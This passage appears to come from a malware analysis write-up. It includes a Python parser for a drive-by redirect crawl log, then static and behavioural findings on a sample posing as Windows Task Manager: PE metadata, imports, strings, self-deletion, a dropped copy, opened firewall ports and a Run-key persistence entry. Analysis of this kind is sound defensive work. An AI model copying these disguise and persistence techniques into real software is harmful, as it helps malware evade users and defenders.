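[2012-10-17 12:43:41] [HTTP] URL: http://jbrnh.com/3ZKtSw8d/js.js (Status: 200, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:43:41] [HTTP] URL: http://jbrnh.com/3ZKtSw8d/js.js (Content-type: application/x-javascript, MD5: d20a786ec45f68eb56f15a589c566b27)
"""

HTTP_RE = re.compile(r"\[HTTP\] URL: (\S+) \(Status: (\d+), Referrer: (\S+)\)")
HASH_RE = re.compile(r"\[HTTP\] URL: (\S+) \(Content-type: ([^,]+), MD5: ([0-9a-f]{32})\)")
REDIR_RE = re.compile(r"\[HREF Redirection \(([^)]+)\)\] Content-Location: (\S+) --> Location: (\S+)")


def parse_log(text):
    """Return (status, md5, edges): status codes per URL, MD5 per URL, and the
    parent -> child edges taken from Referrer fields and document.location hops."""
    status, md5, edges = {}, {}, []
    for line in text.splitlines():
        if (m := HTTP_RE.search(line)):
            url, code, ref = m.groups()
            status.setdefault(url, set()).add(int(code))
            if ref != "None":
                edges.append((ref, url, "referrer"))
        elif (m := HASH_RE.search(line)):
            url, _ctype, digest = m.groups()
            md5[url] = digest
        elif (m := REDIR_RE.search(line)):
            kind, src, dst = m.groups()
            edges.append((src, dst, kind))
    return status, md5, edges


def chain_from(edges, seed):
    """Breadth-first walk from the seed URL: every hop reached, in discovery order."""
    seen, hops, queue = {seed}, [], deque([seed])
    while queue:
        node = queue.popleft()
        for src, dst, kind in edges:
            if src == node and dst not in seen:
                seen.add(dst)
                hops.append((node, dst, kind))
                queue.append(dst)
    return hops


def identical_payloads(md5):
    """Group URLs whose responses hashed the same (the three js.js redirectors)."""
    groups = {}
    for url, digest in md5.items():
        groups.setdefault(digest, []).append(url)
    return {d: sorted(u) for d, u in groups.items() if len(u) > 1}


def landing_hosts(status, edges):
    """Hosts reached only via a document.location hop, with the status codes the
    crawler saw there; compare with what a manual fetch of the same URL returns."""
    hosts = {}
    for _src, dst, kind in edges:
        if kind == "document.location":
            hosts.setdefault(urlsplit(dst).hostname, set()).update(status.get(dst, set()))
    return hosts


if __name__ == "__main__":
    st, hashes, ed = parse_log(LOG)
    for src, dst, kind in chain_from(ed, "http://www.nikecup.net/MSmxYk/index.html"):
        print(f"{kind:18} {src} -> {dst} {sorted(st.get(dst, ()))}")
    print(identical_payloads(hashes))
    print(landing_hosts(st, ed))
```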
- -----------------------------
- 0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
- 0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
- 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
- 0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................
- 0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
- 0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
- 0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
- 0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
- 0080 50 45 00 00 4C 01 04 00 2A 26 7E 50 00 00 00 00 PE..L...*&~P....
- 0090 00 00 00 00 E0 00 0E 01 0B 01 02 32 00 A6 01 00 ...........2....
- // faking a Windows app:
- UninitializedDataSize....: 0
- InitializedDataSize......: 23040
- ImageVersion.............: 0.0
- ProductName..............: Microsoft(R) Windows (R) 2000 Operating System
- FileVersionNumber........: 5.0.2137.1
- LanguageCode.............: English (U.S.)
- FileFlagsMask............: 0x003f
- FileDescription..........: Windows TaskManager
- CharacterSet.............: Unicode
- LinkerVersion............: 2.5
- FileOS...................: Windows NT 32-bit
- MIMEType.................: application/octet-stream
- Subsystem................: Windows GUI
- FileVersion..............: 5.00.2137.1
- TimeStamp................: 2012:10:17 04:29:46+01:00
- FileType.................: Win32 EXE
- PEType...................: PE32
- InternalName.............: taskmgr
- ProductVersion...........: 5.00.2137.1
- SubsystemVersion.........: 4.0
- OSVersion................: 4.0
- OriginalFilename.........: taskmgr.exe
- LegalCopyright...........: Copyright (C) Microsoft Corp. 1991-1999
- MachineType..............: Intel 386 or later, and compatibles
- CompanyName..............: Microsoft Corporation
- CodeSize.................: 108032
- FileSubtype..............: 0
- ProductVersionNumber.....: 5.0.2137.1
- EntryPoint...............: 0x1ef0
- ObjectFileType...........: Executable application
- //Sigcheck
- publisher................: Microsoft Corporation
- product..................: Microsoft(R) Windows (R) 2000 Operating System
- internal name............: taskmgr
- copyright................: Copyright (C) Microsoft Corp. 1991-1999
- original name............: taskmgr.exe
- file version.............: 5.00.2137.1
- description..............: Windows TaskManager
- Name    VirtAddr  VirtSize  RawSize  Entropy  MD5
- .text   4096      107728    108032   7.49     7bb7c23fbff31a0f4dc8c2082f47d453
- .data   114688    13048     12800    1.62     bfd92f96b4b275e9bdc8941a0ac85831
- .rsrc   131072    8368      8704     3.36     210a8ec34d58b64a2531c59aa8344586
- .reloc  143360    516       1024     3.94     1841b4a61bd8a2498e642d7a36c6d596
- Compiled by: Borland Delphi 3.0
- Compile Time: 2012-10-17 12:29:46
- Packed entropy: 7.48782313568
- Name: .text
- Misc: 0x1A4D0
- Misc_PhysicalAddress: 0x1A4D0
- Misc_VirtualSize: 0x1A4D0
- VirtualAddress: 0x1000
- SizeOfRawData: 0x1A600
- PointerToRawData: 0x400
- PointerToRelocations: 0x0
- PointerToLinenumbers: 0x0
- NumberOfRelocations: 0x0
- NumberOfLinenumbers: 0x0
- Characteristics: 0x60000020
- LangID: 040904B0
- LegalCopyright: Copyright (C) Microsoft Corp. 1991-1999
- InternalName: taskmgr
- FileVersion: 5.00.2137.1
- CompanyName: Microsoft Corporation
- ProductName: Microsoft(R) Windows (R) 2000 Operating System
- ProductVersion: 5.00.2137.1
- FileDescription: Windows TaskManager
- OriginalFilename: taskmgr.exe
- ------------------
- imported calls DLL
- -------------------
- 0041EA0C GetCPInfo KERNEL32
- 0041EA10 VirtualAlloc KERNEL32
- 0041EA14 LoadLibraryA KERNEL32
- 0041EA18 GetProcAddress KERNEL32
- 0041EA1C GetWindowsDirectoryW KERNEL32
- 0041EA20 lstrcatW KERNEL32
- 0041EA24 CreateFileW KERNEL32
- 0041EA2C LoadIconA USER32
- 0041EA30 CreateIconIndirect USER32
- 0041EA34 GetDlgCtrlID USER32
- 0041EA38 GetScrollPos USER32
- 0041EA3C RegisterDeviceNotificationA USER32
- 0041EA40 DdeEnableCallback USER32
- 0041EA44 DrawStateA USER32
- 0041EA48 MessageBoxIndirectW USER32
- 0041EA4C LoadMenuA USER32
- 0041EA50 GetTabbedTextExtentA USER32
- 0041EA54 UnpackDDElParam USER32
- 0041EA58 DialogBoxIndirectParamW USER32
- 0041EA5C ToAsciiEx USER32
- 0041EA60 IsWindow USER32
- 0041EA64 LoadKeyboardLayoutA USER32
- 0041EA68 GetCursor USER32
- 0041EA6C UserHandleGrantAccess USER32
- 0041EA70 GetMenuState USER32
- 0041EA74 SetMenuItemInfoA USER32
- 0041EA78 TabbedTextOutW USER32
- 0041EA7C mouse_event USER32
- 0041EA80 DdeSetUserHandle USER32
- 0041EA84 SetWindowWord USER32
- 0041EA88 SetDlgItemTextW USER32
- 0041EA8C IsMenu USER32
- 0041EA90 SetWindowTextW USER32
- 0041EA94 GetSystemMenu USER32
- 0041EA98 RegisterClassA USER32
- 0041EA9C ChangeDisplaySettingsExW USER32
- 0041EAA0 SetMenuInfo USER32
- 0041EAA4 GetKeyState USER32
- 0041EAA8 ChildWindowFromPoint USER32
- 0041EAAC LoadCursorFromFileW USER32
- 0041EAB0 SendMessageCallbackA USER32
- 0041EAB4 DdeKeepStringHandle USER32
- 0041EAB8 FlashWindow USER32
- 0041EABC OpenIcon USER32
- 0041EAC0 CreateMenu USER32
- 0041EAC4 FindWindowW USER32
- 0041EAC8 GetIconInfo USER32
- 0041EACC GetWindowInfo USER32
- 0041EAD0 IsCharAlphaNumericA USER32
- 0041EAD4 FrameRect USER32
- 0041EAD8 FlashWindowEx USER32
- 0041EADC SetSysColors USER32
- 0041EAE0 GetCapture USER32
- 0041EAE4 DdeGetLastError USER32
- 0041EAE8 SetWindowsHookA USER32
- 0041EAEC PostThreadMessageA USER32
- 0041EAF0 TranslateMessage USER32
- 0041EAF4 GetDlgItemTextA USER32
- 0041EAF8 GetShellWindow USER32
- 0041EAFC CreateAcceleratorTableW USER32
- 0041EB00 DrawMenuBar USER32
- 0041EB04 DdeDisconnect USER32
- 0041EB08 SetClipboardData USER32
- 0041EB0C CreateDialogParamW USER32
- 0041EB10 ToUnicodeEx USER32
- 0041EB14 CreatePopupMenu USER32
- 0041EB18 IMPQueryIMEA USER32
- 0041EB1C CloseWindowStation USER32
- 0041EB20 GetGuiResources USER32
- 0041EB24 GetPropW USER32
- 0041EB28 SetActiveWindow USER32
- 0041EB2C CharNextExA USER32
- 0041EB30 IsRectEmpty USER32
- 0041EB34 LockSetForegroundWindow USER32
- 0041EB38 SetScrollRange USER32
- 0041EB3C EnumPropsExW USER32
- 0041EB40 PostMessageA USER32
- 0041EB44 GetClassInfoExW USER32
- 0041EB48 UpdateWindow USER32
- 0041EB4C GetFocus USER32
- 0041EB50 GetWindow USER32
- 0041EB54 PaintDesktop USER32
- 0041EB58 GetKeyboardLayout USER32
- 0041EB5C ChangeMenuA USER32
- 0041EB60 GetThreadDesktop USER32
- 0041EB64 CharLowerBuffW USER32
- 0041EB6C RegOpenKeyExW ADVAPI32
- --------------
- stringzzz
- --------------
- .text:004157E4 00000013 C 3「H4j.JYb-菫ツ\n驟ヘ
- .data:0041C02C 0000000C C CreateFileW
- .data:0041C038 00000009 C kernel32
- .data:0041EB76 0000000A C GetCPInfo
- .data:0041EB82 0000000D C VirtualAlloc
- .data:0041EB92 0000000D C LoadLibraryA
- .data:0041EBA2 0000000F C GetProcAddress
- .data:0041EBB4 00000015 C GetWindowsDirectoryW
- .data:0041EBCC 00000009 C lstrcatW
- .data:0041EBD8 0000000C C CreateFileW
- .data:0041EBE4 0000000D C KERNEL32.dll
- .data:0041EBF4 0000000A C LoadIconA
- .data:0041EC00 00000013 C CreateIconIndirect
- .data:0041EC16 0000000D C GetDlgCtrlID
- .data:0041EC26 0000000D C GetScrollPos
- .data:0041EC36 0000001C C RegisterDeviceNotificationA
- .data:0041EC54 00000012 C DdeEnableCallback
- .data:0041EC68 0000000B C DrawStateA
- .data:0041EC76 00000014 C MessageBoxIndirectW
- .data:0041EC8C 0000000A C LoadMenuA
- .data:0041EC98 00000015 C GetTabbedTextExtentA
- .data:0041ECB0 00000010 C UnpackDDElParam
- .data:0041ECC2 00000018 C DialogBoxIndirectParamW
- .data:0041ECDC 0000000A C ToAsciiEx
- .data:0041ECE8 00000009 C IsWindow
- .data:0041ECF4 00000014 C LoadKeyboardLayoutA
- .data:0041ED0A 0000000A C GetCursor
- .data:0041ED16 00000016 C UserHandleGrantAccess
- .data:0041ED2E 0000000D C GetMenuState
- .data:0041ED3E 00000011 C SetMenuItemInfoA
- .data:0041ED52 0000000F C TabbedTextOutW
- .data:0041ED64 0000000C C mouse_event
- .data:0041ED72 00000011 C DdeSetUserHandle
- .data:0041ED86 0000000E C SetWindowWord
- .data:0041ED96 00000010 C SetDlgItemTextW
- .data:0041EDA8 00000007 C IsMenu
- .data:0041EDB2 0000000F C SetWindowTextW
- .data:0041EDC4 0000000E C GetSystemMenu
- .data:0041EDD4 0000000F C RegisterClassA
- .data:0041EDE6 00000019 C ChangeDisplaySettingsExW
- .data:0041EE02 0000000C C SetMenuInfo
- .data:0041EE10 0000000C C GetKeyState
- .data:0041EE1E 00000015 C ChildWindowFromPoint
- .data:0041EE36 00000014 C LoadCursorFromFileW
- .data:0041EE4C 00000015 C SendMessageCallbackA
- .data:0041EE64 00000014 C DdeKeepStringHandle
- .data:0041EE7A 0000000C C FlashWindow
- .data:0041EE88 00000009 C OpenIcon
- .data:0041EE94 0000000B C CreateMenu
- .data:0041EEA2 0000000C C FindWindowW
- .data:0041EEB0 0000000C C GetIconInfo
- .data:0041EEBE 0000000E C GetWindowInfo
- .data:0041EECE 00000014 C IsCharAlphaNumericA
- .data:0041EEE4 0000000A C FrameRect
- .data:0041EEF0 0000000E C FlashWindowEx
- .data:0041EF00 0000000D C SetSysColors
- .data:0041EF10 0000000B C GetCapture
- .data:0041EF1E 00000010 C DdeGetLastError
- .data:0041EF30 00000010 C SetWindowsHookA
- .data:0041EF42 00000013 C PostThreadMessageA
- .data:0041EF58 00000011 C TranslateMessage
- .data:0041EF6C 00000010 C GetDlgItemTextA
- .data:0041EF7E 0000000F C GetShellWindow
- .data:0041EF90 00000018 C CreateAcceleratorTableW
- .data:0041EFAA 0000000C C DrawMenuBar
- .data:0041EFB8 0000000E C DdeDisconnect
- .data:0041EFC8 00000011 C SetClipboardData
- .data:0041EFDC 00000013 C CreateDialogParamW
- .data:0041EFF2 0000000C C ToUnicodeEx
- .data:0041F000 00000010 C CreatePopupMenu
- .data:0041F012 0000000D C IMPQueryIMEA
- .data:0041F022 00000013 C CloseWindowStation
- .data:0041F038 00000010 C GetGuiResources
- .data:0041F04A 00000009 C GetPropW
- .data:0041F056 00000010 C SetActiveWindow
- .data:0041F068 0000000C C CharNextExA
- .data:0041F076 0000000C C IsRectEmpty
- .data:0041F084 00000018 C LockSetForegroundWindow
- .data:0041F09E 0000000F C SetScrollRange
- .data:0041F0B0 0000000D C EnumPropsExW
- .data:0041F0C0 0000000D C PostMessageA
- .data:0041F0D0 00000010 C GetClassInfoExW
- .data:0041F0E2 0000000D C UpdateWindow
- .data:0041F0F2 00000009 C GetFocus
- .data:0041F0FE 0000000A C GetWindow
- .data:0041F10A 0000000D C PaintDesktop
- .data:0041F11A 00000012 C GetKeyboardLayout
- .data:0041F12E 0000000C C ChangeMenuA
- .data:0041F13C 00000011 C GetThreadDesktop
- .data:0041F150 0000000F C CharLowerBuffW
- .data:0041F160 0000000B C USER32.dll
- .data:0041F16E 0000000E C RegOpenKeyExW
- .data:0041F17C 0000000D C ADVAPI32.dll
- =====================
- behavior check:
- =====================
- Self-deleting;
- drops a payload 1154656.exe (a copy of itself) and uses a CMD command to execute that copy;
- see pic: https://lh3.googleusercontent.com/-XdS_YZJvyKk/UH46i1qRPUI/AAAAAAAAGQk/H9mKzI08TLc/s541/004.jpg
- REGISTRY:
- ----------------------------------
- Keys added: 26
- ----------------------------------
- HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141
- HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000
- HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Control
- HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts
- HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List
- HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141
- HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000
- HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Control
- HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts
- HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\hiv
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.hiv
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.hiv\OpenWithList
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\WAB
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\WAB\WAB4
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\WAB\WAB4\Wab File Name
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Sysinternals
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Sysinternals\Process Explorer
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\WinRAR
- ----------------------------------
- Values added: 112
- ----------------------------------
- HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Control\*NewlyCreated*: 0x00000000
- HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Control\ActiveService: "PROCEXP141"
- HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Service: "PROCEXP141"
- HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Legacy: 0x00000001
- HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\ConfigFlags: 0x00000000
- HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Class: "LegacyDriver"
- HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
- HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\DeviceDesc: "PROCEXP141"
- HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\NextInstance: 0x00000001
- HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\0: "SW\{b7eafdc0-a680-11d0-96d8-00aa0051e51d}\{9B365890-165F-11D0-A195-0020AFD156E4}"
- HKLM\SYSTEM\ControlSet001\Services\RemoteAccess\Performance\Error Count: 0x00000002
- HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications: 0x00000000
- HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\24599:UDP: "24599:UDP:*:Enabled:UDP 24599"
- HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\14780:TCP: "14780:TCP:*:Enabled:TCP 14780"
- HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Control\*NewlyCreated*: 0x00000000
- HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Control\ActiveService: "PROCEXP141"
- HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Service: "PROCEXP141"
- HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Legacy: 0x00000001
- HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\ConfigFlags: 0x00000000
- HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Class: "LegacyDriver"
- HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
- HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\DeviceDesc: "PROCEXP141"
- HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\NextInstance: 0x00000001
- HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\0: "SW\{b7eafdc0-a680-11d0-96d8-00aa0051e51d}\{9B365890-165F-11D0-A195-0020AFD156E4}"
- HKLM\SYSTEM\CurrentControlSet\Services\RemoteAccess\Performance\Error Count: 0x00000002
- HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications: 0x00000000
- HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\24599:UDP: "24599:UDP:*:Enabled:UDP 24599"
- HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\14780:TCP: "14780:TCP:*:Enabled:TCP 14780"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Identities\{8050BE41-0268-42B2-900E-11DE9FEDDDF7}\Identity Ordinal: 0x00000001
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List\File2: "C:\Documents and Settings\rik\デスクトップ\001.bmp"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU\b: 72 00 65 00 67 00 73 00 68 00 6F 00 74 00 2E 00 65 00 78 00 65 00 00 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 72 00 69 00 6B 00 5C 00 C7 30 B9 30 AF 30 C8 30 C3 30 D7 30 00 00
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*\b: "C:\Documents and Settings\rik\デスクトップ\shot001.hiv"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*\c: "C:\Documents and Settings\rik\デスクトップ\002.bmp"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\bmp\b: "C:\Documents and Settings\rik\デスクトップ\002.bmp"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\hiv\a: "C:\Documents and Settings\rik\デスクトップ\shot001.hiv"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\hiv\MRUList: "a"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.hiv\OpenWithList\a: "regshot.exe"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.hiv\OpenWithList\MRUList: "a"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\1: 30 00 30 00 32 00 2E 00 62 00 6D 00 70 00 00 00 3C 00 32 00 00 00 00 00 00 00 00 00 00 00 30 30 32 2E 6C 6E 6B 00 26 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 30 00 30 00 32 00 2E 00 6C 00 6E 00 6B 00 00 00 16 00 00 00
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.bmp\1: 30 00 30 00 32 00 2E 00 62 00 6D 00 70 00 00 00 3C 00 32 00 00 00 00 00 00 00 00 00 00 00 30 30 32 2E 6C 6E 6B 00 26 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 30 00 30 00 32 00 2E 00 6C 00 6E 00 6B 00 00 00 16 00 00 00
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:Jverfunex.yax: 01 00 00 00 06 00 00 00 B0 03 DE 89 1D AC CD 01
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Cebtenz Svyrf\Jverfunex\jverfunex.rkr: 01 00 00 00 06 00 00 00 40 37 10 8A 1D AC CD 01
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\evx\デスクトップ\cebprkc.rkr: 01 00 00 00 06 00 00 00 C0 26 FC 92 1D AC CD 01
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\evx\デスクトップ\hcqngr_synfu_cynlre.rkr: 01 00 00 00 06 00 00 00 60 3E 40 BF 1D AC CD 01
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Run\{006579CE-45C4-AD42-587D-A196614C8284}: ""C:\Documents and Settings\rik\Application Data\Zeon\azys.exe""
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\rik\デスクトップ\procexp.exe: "Sysinternals Process Explorer"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\rik\デスクトップ\update_flash_player.exe: "Windows TaskManager"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\rik\LOCALS~1\Temp\842656.exe: "Windows TaskManager"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\rik\LOCALS~1\Temp\851468.exe: "Windows TaskManager"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\rik\LOCALS~1\Temp\abcd.bat: "abcd"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Server ID: 0x00000003
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\Account Name: "WhoWhere インターネット ディレクトリ サービス"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Server: "ldap.whowhere.com"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP URL: "http://www.whowhere.com"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Search Return: 0x00000064
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Timeout: 0x0000003C
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Authentication: 0x00000000
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Simple Search: 0x00000001
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Logo: "%ProgramFiles%\Common Files\Services\whowhere.bmp"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Server ID: 0x00000002
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\Account Name: "VeriSign インターネット ディレクトリ サービス"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Server: "directory.verisign.com"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP URL: "http://www.verisign.com"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Search Return: 0x00000064
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Timeout: 0x0000003C
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Authentication: 0x00000000
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Search Base: "NULL"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Simple Search: 0x00000001
